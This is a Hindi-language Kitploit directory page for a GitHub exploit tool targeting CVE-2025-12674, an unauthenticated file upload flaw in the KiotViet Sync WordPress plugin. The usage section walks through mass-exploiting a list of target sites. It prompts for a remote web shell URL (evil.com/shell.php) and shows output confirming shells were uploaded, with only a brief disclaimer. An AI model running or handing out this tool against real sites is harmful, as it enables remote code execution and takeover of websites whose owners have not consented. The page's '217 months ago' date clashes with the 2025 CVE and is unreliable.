Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-12674 — KiotViet Sync <= 1.8.5 - अप्रमाणित मनमाना फ़ाइल अपलोड | Kitploit
उपकरण/GitHubGitHub/nxploited/cve-2025-12674
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubnxploited/cve-2025-12674

CVE-2025-12674

KiotViet Sync <= 1.8.5 - अप्रमाणित मनमाना फ़ाइल अपलोड

रिपॉजिटरी देखें
217 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-12674

KiotViet Sync <= 1.8.5 - अनधिकृत मनमानी फ़ाइल अपलोड

🐚 KiotViet Sync <= 1.8.5 - अनधिकृत मनमानी फ़ाइल अपलोड


📝 विवरण

WordPress के लिए KiotViet Sync प्लगइन (संस्करण 1.8.5 तक) create_media() फ़ंक्शन में फ़ाइल प्रकार सत्यापन की कमी के कारण मनमानी फ़ाइल अपलोड के लिए असुरक्षित है।
यह भेद्यता अनधिकृत हमलावरों को सर्वर पर मनमानी फ़ाइलें अपलोड करने की अनुमति देती है, जिससे दूरस्थ कोड निष्पादन हो सकता है।

  • CVE: CVE-2025-12674
  • CVSS: 9.8 (गंभीर)

🚀 उपयोग

  1. इस रिपॉजिटरी को क्लोन करें, या स्क्रिप्ट डाउनलोड करें।

  2. अपने लक्ष्य तैयार करें:
    प्रत्येक लक्ष्य को list.txt नामक फ़ाइल में एक पंक्ति में रखें।

    root@kitploit:~
    example.com
    site2.com
    http://site3.com
    
  3. एक्सप्लॉइट स्क्रिप्ट चलाएं:
    स्क्रिप्ट का नाम है:

    root@kitploit:~
    CVE-2025-12674.py
    
    root@kitploit:~
    python3 CVE-2025-12674.py
    
  4. जब संकेत दिया जाए, तो अपने विकल्प दर्ज करें:

    root@kitploit:~
    Enter targets file name (default: list.txt): list.txt
    Enter number of threads (default: 10): 
    Enter REMOTE SHELL URL (direct link): http://evil.com/shell.php
    ╭──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
    │ Loaded 1 targets. Threads: 10.                                                                                           │
    ╰──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
    ╭──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
    │ http://nxk.ddev.site                                                                                                     │
    │ Trying KiotViet exploit...                                                                                               │
    ╰──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
    ╔══════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════╗
    ║ ✔ Shell uploaded!                                                                                                        ║
    ║ Check here:                                                                                                              ║
    ║ http://nxk.ddev.site/wp-content/uploads/2026/01/                                                                         ║
    ║                                                                                                                          ║
    ╚══════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════╝
               Summary           
                                 
      Metric              Value  
     ─────────────────────────── 
      Total attempts          1  
      Successful shells       1  
      Failed attempts         0  
    
  • अपलोड किए गए शेल के लिए आउटपुट निर्देशिका फ़ाइल का नाम नहीं दिखाती (क्योंकि यह गतिशील रूप से उत्पन्न होता है)।

📂 आउटपुट

  • सभी सफल शेल पथ shells.txt में सहेजे जाते हैं।
  • आउटपुट की बैकअप प्रतियां टाइमस्टैम्प के साथ स्वचालित रूप से बनाई जाती हैं।

⚠️ अस्वीकरण

यह स्क्रिप्ट केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान की गई है।
उन प्रणालियों के खिलाफ अनधिकृत उपयोग जिनके आप मालिक नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है, अवैध और अनैतिक है।
लेखक दुरुपयोग या किसी भी क्षति के लिए कोई जिम्मेदारी नहीं लेता है।


👤 लेखक

Nxploited (Khaled Alenazi)

टूल डाउनलोड करें